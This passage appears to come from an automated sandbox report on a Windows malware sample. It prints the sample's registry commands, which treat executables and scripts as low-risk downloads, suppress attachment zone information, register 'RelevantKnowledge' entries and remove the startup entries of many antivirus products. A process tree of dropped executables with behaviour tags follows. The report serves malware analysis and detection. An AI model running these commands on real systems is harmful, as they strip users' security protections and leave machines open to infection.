Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
)
- Suspicious use of AdjustPrivilegeToken
-
Level 1: C:\Users\Admin\AppData\Local\Temp\D1FC.exe
Command line: C:\Users\Admin\AppData\Local\Temp\D1FC.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
Level 2: C:\Windows\SysWOW64\cmd.exe
Command line: cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\D420.exeC:\Users\Admin\AppData\Local\Temp\D420.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\D420.exeC:\Users\Admin\AppData\Local\Temp\D420.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 14523⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\D951.exeC:\Users\Admin\AppData\Local\Temp\D951.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2F42.exeC:\Users\Admin\AppData\Local\Temp\2F42.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 7482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 8442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 8922⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 8882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads